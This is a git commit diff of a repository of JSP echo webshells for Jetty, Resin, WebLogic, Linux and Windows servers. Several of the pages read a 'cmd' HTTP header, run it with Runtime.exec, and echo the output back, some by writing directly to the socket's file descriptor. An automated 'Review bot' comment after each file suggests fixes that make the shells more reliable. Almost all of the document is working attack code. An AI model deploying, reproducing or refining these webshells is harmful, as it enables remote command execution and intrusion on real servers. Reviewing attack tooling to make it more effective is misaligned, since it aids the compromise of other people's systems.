
Commit e5ea486

author
feihong
committed
update
1 parent e70859f commit e5ea486


9 files changed

+705
-55
lines changed


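--- a/Jetty/code/jetty789Echo.jsp
+++ b/Jetty/code/jetty789Echo.jsp
@@ -10,7 +10,8 @@
 obj = field.get(obj);
 
 Object[] obj_arr = (Object[]) obj;
-for(Object o : obj_arr){
+for(int i = 0; i < obj_arr.length; i++){
+Object o = obj_arr[i];
 if(o == null) continue;
 
 field = o.getClass().getDeclaredField("value");
@@ -19,35 +20,35 @@
 
 if(obj != null && obj.getClass().getName().endsWith("AsyncHttpConnection")){
 Object connection = obj;
-java.lang.reflect.Method method = connection.getClass().getMethod("getRequest");
-obj = method.invoke(connection);
+java.lang.reflect.Method method = connection.getClass().getMethod("getRequest", null);
+obj = method.invoke(connection, null);
 
-method = obj.getClass().getMethod("getHeader", String.class);
-obj = method.invoke(obj, "cmd");
+method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
+obj = method.invoke(obj, new Object[]{"cmd"});
 
 String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
 
-method = connection.getClass().getMethod("getPrintWriter", String.class);
-java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8");
+method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class});
+java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"});
 printWriter.println(res);
 
 }else if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){
-java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel");
-Object httpChannel = method.invoke(obj);
+java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel", null);
+Object httpChannel = method.invoke(obj, null);
 
-method = httpChannel.getClass().getMethod("getRequest");
-obj = method.invoke(httpChannel);
+method = httpChannel.getClass().getMethod("getRequest", null);
+obj = method.invoke(httpChannel, null);
 
-method = obj.getClass().getMethod("getHeader", String.class);
-obj = method.invoke(obj, "cmd");
+method = obj.getClass().getMethod("getHeader", new Class[]{String.class});
+obj = method.invoke(obj, new Object[]{"cmd"});
 
 String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next();
 
-method = httpChannel.getClass().getMethod("getResponse");
-obj = method.invoke(httpChannel);
+method = httpChannel.getClass().getMethod("getResponse", null);
+obj = method.invoke(httpChannel, null);
 
-method = obj.getClass().getMethod("getWriter");
-java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj);
+method = obj.getClass().getMethod("getWriter", null);
+java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null);
 printWriter.println(res);
 }
 }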
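Review bot: After `obj = method.invoke(obj, new Object[]{"cmd"});` the variable `obj` holds the value of the `cmd` request header, which is null whenever the header is absent, so the following `Runtime.getRuntime().exec(obj.toString())` throws a NullPointerException in both the AsyncHttpConnection and the HttpConnection branch; a guard such as `if(obj == null) continue;` directly after each getHeader invoke keeps the thread-local scan going instead. `new java.util.Scanner(...).useDelimiter("\\A").next()` likewise throws NoSuchElementException when the command prints nothing to stdout, and stderr is never read, so a failing command surfaces as an exception rather than an empty echo; `hasNext() ? next() : ""` on the scanner would cover that. Passing `null` in place of the varargs arrays is presumably for JSP compilers that predate varargs; `new Class[0]` / `new Object[0]` would express the same thing explicitly and avoid the ambiguous-null-varargs warning on newer javac. The `for` loop these branches sit in opens in the first hunk of this file, and the scriptlet continues past the second hunk.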

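--- a/Linux/code/case2.jsp
+++ b/Linux/code/case2.jsp
@@ -3,34 +3,31 @@
 String command = "ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\"[\"}''{print $2}'|sed 's/.$//'";
 String[] cmd = new String[]{"/bin/sh", "-c", command };
 java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
-
-java.util.List<String> res1 = new java.util.ArrayList<>();
+java.util.List res1 = new java.util.ArrayList();
 String line = "";
 while ((line = br.readLine()) != null){
 res1.add(line);
 }
 br.close();
 
-Thread.sleep(2000);
+Thread.sleep((long)2000);
 
 command = "ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'";
 cmd = new String[]{"/bin/sh", "-c", command };
 br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));
-
-java.util.List<String> res2 = new java.util.ArrayList<>();
+java.util.List res2 = new java.util.ArrayList();
 while ((line = br.readLine()) != null){
 res2.add(line);
 }
-br.close();
+br.close();
 
 int index = 0;
 int max = 0;
 for(int i = 0; i < res1.size(); i++){
 for(int j = 0; j < res2.size(); j++){
-if(res2.get(j).contains(res1.get(i))){
-String socketNo = res2.get(j).split("\\s+")[1].substring(8);
+if(((String)res2.get(j)).contains((String)res1.get(i))){
+String socketNo = ((String)res2.get(j)).split("\\s+")[1].substring(8);
 socketNo = socketNo.substring(0, socketNo.length() - 1);
-
 if(Integer.parseInt(socketNo) > max) {
 max = Integer.parseInt(socketNo);
 index = j;
@@ -39,14 +36,12 @@
 }
 }
 
-int fd = Integer.parseInt(res2.get(index).split("\\s")[0]);
-
-java.lang.reflect.Constructor<java.io.FileDescriptor> c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
+int fd = Integer.parseInt(((String)res2.get(index)).split("\\s")[0]);
+java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
 c.setAccessible(true);
-
-cmd = new String[]{"/bin/sh", "-c", "ls -l" };
+cmd = new String[]{"/bin/sh", "-c", "echo \"It works!\"" };
 String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
-
-java.io.FileOutputStream os = new java.io.FileOutputStream(c.newInstance(fd));
-os.write(res.getBytes());
+String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
+java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
+os.write(result.getBytes());
 %>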
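Review bot: The `Content-Length` value on the new `String result = ...` line is `res.length()`, a UTF-16 character count, while the body goes out as `result.getBytes()` in the platform charset, so any non-ASCII byte in the command output makes the advertised length smaller than what is written and the client truncates the body; advertise `res.getBytes().length` instead (ideally with the same explicit charset on both calls). The status line and headers are joined with bare `\n` where HTTP/1.1 specifies `\r\n`; most clients tolerate LF, but a strict parser will reject the response. `os` is never flushed or closed, and it wraps a socket descriptor the container still owns, so the container's own response may follow on the same connection — the `Connection: close` header plus a correct `Content-Length` is what lets the client ignore that trailing data, which makes the length bug above matter. Picking the target connection as the socket with the highest inode in `/proc/$PPID/fd` is a heuristic that can select another client's socket under concurrent requests; a comment stating that assumption would help whoever runs this on a busy server.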

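--- a/Resin/code/resinEcho.jsp
+++ b/Resin/code/resinEcho.jsp
@@ -1,6 +1,6 @@
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <%
-Class clazz = Thread.currentThread().getClass();
+Class clazz = Thread.currentThread().getClass();
 java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals");
 field.setAccessible(true);
 Object obj = field.get(Thread.currentThread());
@@ -10,22 +10,23 @@
 obj = field.get(obj);
 
 Object[] obj_arr = (Object[]) obj;
-for(Object o : obj_arr) {
+for(int i = 0; i < obj_arr.length; i++) {
+Object o = obj_arr[i];
 if (o == null) continue;
 
 field = o.getClass().getDeclaredField("value");
 field.setAccessible(true);
 obj = field.get(o);
 
-if(obj instanceof com.caucho.server.http.HttpRequest){
+if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){
 com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj;
 String cmd = httpRequest.getHeader("cmd");
 String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
-
 com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();
-java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream");
+httpResponse.setHeader("Content-Length", res.length() + "");
+java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
 method.setAccessible(true);
-com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse);
+com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
 httpResponseStream.write(res.getBytes(), 0, res.length());
 httpResponseStream.close();
 }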
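Review bot: The new `httpResponse.setHeader("Content-Length", res.length() + "")` advertises a character count, and the context line `httpResponseStream.write(res.getBytes(), 0, res.length())` below it slices the byte array by that same character count, so a single multi-byte character in the command output both truncates the body that is written and mis-declares its length; compute the bytes once, `byte[] body = res.getBytes("UTF-8");`, and use `body.length` for both the header and the write. The switch from `instanceof` to `obj.getClass().getName().equals(...)` is stricter — a subclass of `com.caucho.server.http.HttpRequest` no longer matches — and since the cast on the next line still needs the class at compile time, the reason for the change is not visible here; a one-line comment stating it would help. `getHeader("cmd")` returns null when the header is absent and `Runtime.exec((String) null)` then throws NullPointerException, and `Scanner.next()` throws NoSuchElementException when the command prints nothing, so both cases abort the scriptlet rather than echo an empty body. The `for` loop closes on the last hunk line and the scriptlet continues outside the hunk.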

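--- a/Windows/code/WindowsEcho.jsp
+++ b/Windows/code/WindowsEcho.jsp
@@ -62,7 +62,7 @@
 Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
 
 String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next();
-String result = "HTTP/1.1 200 OK\nConnection: close\n\n" + res + "\n";
+String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
 write.invoke(socketOutputStream, new Object[]{result.getBytes()});
 }catch (Exception e){
 //pass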
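Review bot: The `Content-Length` added on the `String result = ...` line is `res.length()`, a character count, but the bytes handed to `write.invoke(socketOutputStream, new Object[]{result.getBytes()})` are encoded in the platform charset, which on Windows is usually a legacy code page; the hard-coded `echo "It works!!"` is ASCII so the two agree here, but as soon as this is pointed at real command output with non-ASCII text the declared length is too small and the client truncates — `res.getBytes().length` is the value to send. The header separator is `\n` where HTTP/1.1 specifies `\r\n`. The enclosing `try` opens before the hunk and its `catch (Exception e){ //pass` discards every failure silently, which is exactly what hides a length or reflection mistake while debugging; at least `e.printStackTrace();` or a comment saying why errors are intentionally dropped would help.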

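--- a/weblogic/code/weblogic-10.0.3.jsp
+++ b/weblogic/code/weblogic-10.0.3.jsp
@@ -1,10 +1,10 @@
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <%
 String cmd = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getHeader("cmd");
-String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
-weblogic.servlet.internal.ServletResponseImpl response = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();
-weblogic.servlet.internal.ServletOutputStreamImpl outputStream = response.getServletOutputStream();
-outputStream.writeStream(new weblogic.xml.util.StringInputStream(res));
-outputStream.flush();
-response.getWriter().write("");
+String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+weblogic.servlet.internal.ServletResponseImpl r = ((weblogic.servlet.internal.ServletRequestImpl)((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()).getResponse();
+weblogic.servlet.internal.ServletOutputStreamImpl outputStream = r.getServletOutputStream();
+outputStream.writeStream(new weblogic.xml.util.StringInputStream(res));
+outputStream.flush();
+response.getWriter().write("");
 %>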
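Review bot: With the local renamed to `r`, the last scriptlet line `response.getWriter().write("");` now refers to the JSP implicit `HttpServletResponse` rather than the WebLogic `ServletResponseImpl` the preceding three lines wrote to; the sibling `weblogic-12.1.3.jsp` in this commit issues the same trailing `getWriter().write("")` on the WebLogic response object, so this looks like a leftover of the rename and `r.getWriter().write("");` is probably what was meant — if the implicit object is intended, a comment should say why. The rename itself is justified: under standard JSP translation a local named `response` collides with the `_jspService` parameter of the same name and the page does not compile. `getHeader("cmd")` on the context line returns null when the header is missing and `Runtime.exec((String) null)` then throws NullPointerException, so `if(cmd == null) return;` before the exec line would give a clean no-op instead of a 500.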

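--- a/weblogic/code/weblogic-12.1.3.jsp
+++ b/weblogic/code/weblogic-12.1.3.jsp
@@ -1,11 +1,12 @@
 <%@ page contentType="text/html;charset=UTF-8" language="java" %>
 <%
-java.lang.reflect.Field field = ((weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)this.getCurrentWork()).getClass().getDeclaredField("connectionHandler");
-field.setAccessible(true);
-HttpConnectionHandler httpConn = (HttpConnectionHandler) field.get(this.getCurrentWork());
-String cmd = "echo \"It works!\"";
-String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
-httpConn.getServletRequest().getResponse().getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(res));
-httpConn.getServletRequest().getResponse().getServletOutputStream().flush();
-httpConn.getServletRequest().getResponse().getWriter().write("");
+weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread)Thread.currentThread();
+java.lang.reflect.Field field = ((weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)executeThread.getCurrentWork()).getClass().getDeclaredField("connectionHandler");
+field.setAccessible(true);
+weblogic.servlet.internal.HttpConnectionHandler httpConn = (weblogic.servlet.internal.HttpConnectionHandler) field.get(executeThread.getCurrentWork());
+String cmd = "echo \"It works!\"";
+String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+httpConn.getServletRequest().getResponse().getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(res));
+httpConn.getServletRequest().getResponse().getServletOutputStream().flush();
+httpConn.getServletRequest().getResponse().getWriter().write("");
 %>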
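Review bot: `executeThread.getCurrentWork()` is called twice and the first call is cast straight to `WlsRequestExecutor`, so if the current work item is any other `Runnable` the cast throws ClassCastException and the page errors out with a stack trace; capture it once, `Object work = executeThread.getCurrentWork();`, and guard with `if(!(work instanceof weblogic.servlet.provider.ContainerSupportProviderImpl.WlsRequestExecutor)) return;` before the reflection, then pass `work` to both the `getClass()` and the `field.get(...)` call. `getDeclaredField("connectionHandler")` is resolved on the runtime class of that object, which throws NoSuchFieldException if the field is declared in a superclass; that works while the runtime class is `WlsRequestExecutor` itself, so a comment naming the WebLogic version this was verified against would save the next reader a debugging round. The `Thread.currentThread()` cast to `weblogic.work.ExecuteThread` is itself unchecked and fails the same way on a non-WebLogic worker thread, which the guard above does not cover.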

weblogic/img/x001.png

67 KB

weblogic/img/x002.png

59.5 KB
